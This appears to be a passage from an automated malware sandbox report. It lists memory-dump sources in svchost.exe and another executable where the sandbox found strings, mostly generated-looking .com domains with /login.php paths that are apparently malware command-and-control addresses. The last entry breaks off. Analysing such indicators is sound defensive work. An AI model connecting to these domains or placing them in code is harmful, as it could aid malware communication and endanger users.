Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyces.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600952988.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600106143.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600135684.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydoh.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643374628.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638510682.000000000CCE2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahydyb.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyfyz.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522449527.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522570202.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhob.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyhys.com/
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahypoz.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1713830346.0000000005A69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqah.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668590498.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668142095.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1948330211.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqas.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620757969.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620677895.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618514695.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620758729.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621135281.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621261518.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617312754.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyraw.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600952988.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600106143.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600135684.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600430482.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600576251.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600797663.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvew.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqypiz.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqez.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqiw.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyreh.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyrib.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870012062.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635455188.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzoh.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694567611.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyzuw.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872007103.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyduh.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfaz.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1692907290.000000000333D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001297000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gatyfus.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatykyh.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643374628.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatypas.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 